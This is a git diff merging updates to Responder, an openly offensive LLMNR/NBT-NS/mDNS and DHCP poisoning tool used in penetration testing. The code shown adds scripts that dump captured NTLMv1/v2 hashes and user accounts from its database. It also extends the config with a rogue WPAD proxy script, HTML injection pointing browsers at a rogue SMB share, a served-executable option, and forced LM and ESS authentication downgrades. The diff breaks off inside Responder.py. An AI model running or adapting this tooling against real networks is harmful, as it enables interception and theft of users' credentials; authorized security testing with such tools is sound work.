Merge branch 'master' of https://github.com/lgandx/Responder

Added DHCP server
2025-12-07 21:21:34 +00:00 · 2021-10-25 22:52:35 -03:00 · 2021-10-25 22:51:39 -03:00 · 2021-10-25 22:41:01 -03:00 · 2021-05-17 21:33:16 -03:00 · 2021-05-16 09:55:32 +02:00
118 changed files with 72791 additions and 2426 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -2,4 +2,4 @@
 *.db
 *.txt
 *.log
-logs/*
+
--- a/DumpHash.py
+++ b/DumpHash.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sqlite3
+
+def DumpHashToFile(outfile, data):
+	with open(outfile,"w") as dump:
+		dump.write(data)
+
+def DbConnect():
+    cursor = sqlite3.connect("./Responder.db")
+    return cursor
+
+def GetResponderCompleteNTLMv2Hash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     Output = ""
+     for row in res.fetchall():
+         Output += '{0}'.format(row[0])+'\n'
+     return Output
+
+def GetResponderCompleteNTLMv1Hash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     Output = ""
+     for row in res.fetchall():
+         Output += '{0}'.format(row[0])+'\n'
+     return Output
+
+cursor = DbConnect()
+print("Dumping NTLMV2 hashes:")
+v2 = GetResponderCompleteNTLMv2Hash(cursor)
+DumpHashToFile("DumpNTLMv2.txt", v2)
+print(v2)
+print("\nDumping NTLMv1 hashes:")
+v1 = GetResponderCompleteNTLMv1Hash(cursor)
+DumpHashToFile("DumpNTLMv1.txt", v1)
+print(v1)
--- a/OSX_launcher.sh
+++ b/OSX_launcher.sh
@@ -0,0 +1,39 @@
+# responder launcher
+# set -x
+# Usage:
+# ./responderd /path/to/responder interface responder_options
+
+# port list
+# Everything -> tcp:21 tcp:80 tcp:25 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:443 tcp:445 tcp:110 tcp:389 tcp:1433 tcp:3141 udp:5353 udp:5355
+PORT_LIST=(tcp:21 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:445 tcp:389 tcp:1433 udp:5353 udp:5355)
+SVC_LIST=()
+
+# check for running processes and kill them one by one
+# looping over everything rather than doing a mass kill because some processes may be 
+# children and may not need to be killed
+for port in ${PORT_LIST[@]}; do
+	PROC=$(lsof +c 0 -i $port | grep -m 1 -v 'launchd\|COMMAND' | cut -d' ' -f1)
+	if [ -n "$PROC" ]; then
+        AGENT=$(sudo launchctl list | grep -m 1 $PROC | cut -f3 | sed 's/.reloaded//g')
+
+        # load/unload are listed as "legacy" in 10.10+ may need to change this someday
+		echo "Stopping $PROC"
+        sudo launchctl unload -w /System/Library/LaunchDaemons/$AGENT.plist
+
+        # append killed service to new array
+        SVC_LIST+=($AGENT)
+	fi
+done
+
+# get IP address
+IP=$(ifconfig $2 | grep 'inet ' | cut -d' ' -f2)
+
+# Launch responder
+python $1 $3 -i $IP
+
+# restore stopped services
+for agent in ${SVC_LIST[@]}; do
+	echo "Starting $agent"
+		sudo launchctl load -w /System/Library/LaunchDaemons/$agent.plist
+
+done
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
-# Responder.py #
+# Responder/MultiRelay #

-LLMNR/NBT-NS/mDNS Poisoner
+LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.

 Author: Laurent Gaffie <laurent.gaffie@gmail.com >  https://g-laurent.blogspot.com

@@ -8,23 +8,23 @@ Author: Laurent Gaffie <laurent.gaffie@gmail.com >  https://g-laurent.blogspot.c

 ## Intro ##

-Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.
+Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB.

-The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
+The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix. The option -d is also available if you want to poison Domain Service name queries.

 ## Features ##

 - Built-in SMB Auth server.
 	
-Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
+Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default.

 - Built-in MSSQL Auth server.

-In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.
+In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019.

 - Built-in HTTP Auth server.

-In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
+In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari.

 Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim.

@@ -34,7 +34,11 @@ Same as above. The folder certs/ contains 2 default keys, including a dummy pri

 - Built-in LDAP Auth server.

-In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
+In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for LDAP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.
+
+- Built-in DCE-RPC Auth server.
+
+In order to redirect DCE-RPC Authentication to this tool, you will need to set the option -r and -d (NBT-NS queries for DCE-RPC server lookup are sent using the Workstation and Domain Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019.

 - Built-in FTP, POP3, IMAP, SMTP Auth servers.

@@ -42,7 +46,7 @@ This modules will collect clear text credentials.

 - Built-in DNS server.

-This server will answer type A queries. This is really handy when it's combined with ARP spoofing. 
+This server will answer type SRV and A queries. This is really handy when it's combined with ARP spoofing. 

 - Built-in WPAD Proxy Server.

@@ -66,7 +70,7 @@ For MITM on Windows XP/2003 and earlier Domain members. This attack combined wit

    python tools/DHCP.py

-DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL.
+DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. To inject a DNS server, domain, route on all Windows version and any linux box, use -R

 - Analyze mode.

@@ -74,13 +78,13 @@ This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the networ

 ## Hashes ##

-All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format:
+All hashes are printed to stdout and dumped in a unique John Jumbo compliant file, using this format:

    (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

 Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v).

- Responder will logs all its activity to Responder-Session.log
+- Responder will log all its activity to Responder-Session.log
 - Analyze mode will be logged to Analyze-Session.log
 - Poisoning will be logged to Poisoners-Session.log

@@ -89,7 +93,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c

 ## Considerations ##

- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353.

 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.

@@ -131,6 +135,11 @@ Options:
 	                        BROWSER, LLMNR requests without responding.
 	  -I eth0, --interface=eth0
 	                        Network interface to use.
+          -i 10.0.0.21, --ip=10.0.0.21
+                                Local IP to use (only for OSX)
+          -e 10.0.0.22, --externalip=10.0.0.22
+                                Poison all requests with another IP address than
+                                Responder's one.
 	  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
 	  -r, --wredir          Enable answers for netbios wredir suffix queries.
 	                        Answering to wredir will likely break stuff on the
@@ -154,18 +163,56 @@ Options:
                                with -r. Default: Off
 	  --lm                  Force LM hashing downgrade for Windows XP/2003 and
 	                        earlier. Default: Off
+	  --disable-ess         Force ESS downgrade. Default: Off
 	  -v, --verbose         Increase verbosity.
 	

+## Donation ##

+You can contribute to this project by donating to the following $XLM (Stellar Lumens) address:

+"GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH"
+
+Or BTC address:
+
+"1HkFmFs5fmbCoJ7ZM5HHbGgjyqemfU9o7Q"
+
+## Acknowledgments ##
+
+Late Responder development has been possible because of the donations received from individuals and companies.
+
+We would like to thanks those major sponsors:
+
+- SecureWorks: https://www.secureworks.com/
+
+- Synacktiv: https://www.synacktiv.com/
+
+- Black Hills Information Security: http://www.blackhillsinfosec.com/
+
+- TrustedSec: https://www.trustedsec.com/
+
+- Red Siege Information Security: https://www.redsiege.com/
+
+- Open-Sec: http://www.open-sec.com/
+
+- And all, ALL the pentesters around the world who donated to this project.
+
+Thank you.
+
+## Official Discord Channel
+
+Come hang out on Discord!
+
+[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/sEkn3aa)

 ## Copyright ##

 NBT-NS/LLMNR Responder

 Responder, a network take-over set of tools created and maintained by Laurent Gaffie.
+
 email: laurent.gaffie@gmail.com
+
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation, either version 3 of the License, or
--- a/Report.py
+++ b/Report.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sqlite3
+import os
+
+def color(txt, code = 1, modifier = 0):
+	if txt.startswith('[*]'):
+		settings.Config.PoisonersLogger.warning(txt)
+	elif 'Analyze' in txt:
+		settings.Config.AnalyzeLogger.warning(txt)
+
+	if os.name == 'nt':  # No colors for windows...
+		return txt
+	return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+def DbConnect():
+    cursor = sqlite3.connect("./Responder.db")
+    return cursor
+
+def GetResponderData(cursor):
+     res = cursor.execute("SELECT * FROM Responder")
+     for row in res.fetchall():
+         print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
+
+def GetResponderUsernamesStatistic(cursor):
+     res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
+     for row in res.fetchall():
+         print(color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1))
+
+def GetResponderUsernames(cursor):
+     res = cursor.execute("SELECT DISTINCT user FROM Responder")
+     for row in res.fetchall():
+         print('User account: {0}'.format(row[0]))
+
+def GetResponderUsernamesWithDetails(cursor):
+     res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
+     for row in res.fetchall():
+         print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
+
+
+def GetResponderCompleteHash(cursor):
+     res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
+     for row in res.fetchall():
+         print('{0}'.format(row[0]))
+
+def GetUniqueLookups(cursor):
+     res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
+     for row in res.fetchall():
+         print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
+
+
+def GetStatisticUniqueLookups(cursor):
+     res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
+     for row in res.fetchall():
+         print(color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1))
+
+
+def SavePoisonersToDb(result):
+
+	for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
+		if not k in result:
+			result[k] = ''
+
+def SaveToDb(result):
+
+	for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
+		if not k in result:
+			result[k] = ''
+
+cursor = DbConnect()
+print(color("[+] Generating report...", code = 3, modifier = 1))
+print(color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1))
+GetUniqueLookups(cursor)
+GetStatisticUniqueLookups(cursor)
+print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1))
+GetResponderUsernames(cursor)
+print(color("\n[+] Username details:", code = 2, modifier = 1))
+GetResponderUsernamesWithDetails(cursor)
+GetResponderUsernamesStatistic(cursor)
+#print color("\n[+] Captured hashes:", code = 2, modifier = 1)
+#GetResponderCompleteHash(cursor)
--- a/Responder.conf
+++ b/Responder.conf
@@ -3,6 +3,7 @@
 ; Servers to start
 SQL = On
 SMB = On
+RDP = On
 Kerberos = On
 FTP = On
 POP = On
@@ -12,9 +13,12 @@ HTTP = On
 HTTPS = On
 DNS = On
 LDAP = On
+DCERPC = On
+WINRM = On

-; Custom challenge
-Challenge = 1122334455667788
+; Custom challenge. 
+; Use "Random" for generating a random challenge for each requests (Default)
+Challenge = Random

 ; SQLite Database file
 ; Delete this file to re-capture previously captured hashes
@@ -38,18 +42,18 @@ RespondTo =

 ; Specific NBT-NS/LLMNR names to respond to (default = All)
 ; Example: RespondTo = WPAD, DEV, PROD, SQLINT
+;RespondToName = WPAD, DEV, PROD, SQLINT
 RespondToName = 
-
 ; Specific IP Addresses not to respond to (default = None)
 ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
 DontRespondTo = 

 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
 ; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+DontRespondToName = ISATAP

 ; If set to On, we will stop answering further requests from a host
-; if a hash hash been previously captured for this host.
+; if a hash has been previously captured for this host.
 AutoIgnoreAfterSuccess = Off

 ; If set to On, we will send ACCOUNT_DISABLED when the client tries
@@ -57,6 +61,11 @@ AutoIgnoreAfterSuccess = Off
 ; This may break file serving and is useful only for hash capture
 CaptureMultipleCredentials = On

+; If set to On, we will write to file all hashes captured from the same host. 
+; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, 
+; domain\popo, domain\zozo. Recommended value: On, capture everything.
+CaptureMultipleHashFromSameHost = On
+
 [HTTP Server]

 ; Set to On to always serve the custom EXE
@@ -73,18 +82,18 @@ Serve-Html = Off
 HtmlFilename = files/AccessDenied.html

 ; Custom EXE File to serve
-ExeFilename = files/BindShell.exe
+ExeFilename = ;files/filetoserve.exe

 ; Name of the downloaded .exe that the client will see
 ExeDownloadName = ProxyClient.exe

 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';}
+WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}

 ; HTML answer to inject in HTTP responses (before </body> tag).
 ; Set to an empty string to disable.
 ; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
-HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
+HTMLToInject = <img src='file://///RespProxySrv/pictures/logso.jpg' alt='Loading' height='1' width='1'>

 [HTTPS Server]

--- a/Responder.py
+++ b/Responder.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -16,20 +16,24 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import optparse
 import ssl
-
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+try:
+	from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+except:
+	from socketserver import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()

 parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
 parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',      action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+parser.add_option('-I','--interface',      action="store",      help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None)
+parser.add_option('-i','--ip',             action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
+
+parser.add_option('-e', "--externalip",    action="store",      help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP",  metavar="10.0.0.22", default=None)
 parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
 parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
-parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
+parser.add_option('-d', '--DHCP',          action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
 parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
 parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
 parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
@@ -38,14 +42,15 @@ parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM
 parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)

 parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
+parser.add_option('--disable-ess',         action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
 parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
 options, args = parser.parse_args()

 if not os.geteuid() == 0:
-    print color("[!] Responder must be run as root.")
+    print(color("[!] Responder must be run as root."))
    sys.exit(-1)
-elif options.OURIP is None and IsOsX() is True:
-    print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
+elif options.OURIP == None and IsOsX() == True:
+    print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
    parser.print_help()
    exit(-1)

@@ -56,15 +61,22 @@ StartupMessage()

 settings.Config.ExpandIPRanges()

-if settings.Config.AnalyzeMode:
-	print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
+#Create the DB, before we start Responder.
+CreateResponderDb()

 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
+				raise
 				pass
 		UDPServer.server_bind(self)

@@ -72,11 +84,35 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
+				raise
 				pass
 		TCPServer.server_bind(self)

+class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
+	def server_bind(self):
+		if OsInterfaceIsSupported():
+			try:
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+			except:
+				raise
+				pass
+		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+		TCPServer.server_bind(self)
+
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
@@ -88,15 +124,21 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):

 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
+				raise
 				pass
 		UDPServer.server_bind(self)

 class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.252"
-
 		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
 		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
 		
@@ -104,22 +146,30 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
 		
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
 			except:
-				pass
+				raise
+				#pass
 		UDPServer.server_bind(self)

 ThreadingUDPServer.allow_reuse_address = 1
 ThreadingTCPServer.allow_reuse_address = 1
 ThreadingUDPMDNSServer.allow_reuse_address = 1
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+ThreadingTCPServerAuth.allow_reuse_address = 1

 def serve_thread_udp_broadcast(host, port, handler):
 	try:
-		server = ThreadingUDPServer(('', port), handler)
+		server = ThreadingUDPServer((host, port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")

 def serve_NBTNS_poisoner(host, port, handler):
 	serve_thread_udp_broadcast(host, port, handler)
@@ -129,36 +179,48 @@ def serve_MDNS_poisoner(host, port, handler):
 		server = ThreadingUDPMDNSServer((host, port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")

 def serve_LLMNR_poisoner(host, port, handler):
 	try:
 		server = ThreadingUDPLLMNRServer((host, port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		raise
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")

 def serve_thread_udp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingUDPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingUDPServer((host, port), handler)
 			server.serve_forever()
 		else:
 			server = ThreadingUDPServer((host, port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")

 def serve_thread_tcp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingTCPServer((host, port), handler)
 			server.serve_forever()
 		else:
 			server = ThreadingTCPServer((host, port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
+
+def serve_thread_tcp_auth(host, port, handler):
+	try:
+		if OsInterfaceIsSupported():
+			server = ThreadingTCPServerAuth((host, port), handler)
+			server.serve_forever()
+		else:
+			server = ThreadingTCPServerAuth((host, port), handler)
+			server.serve_forever()
+	except:
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")

 def serve_thread_SSL(host, port, handler):
 	try:
@@ -167,7 +229,7 @@ def serve_thread_SSL(host, port, handler):
 		key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)

 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
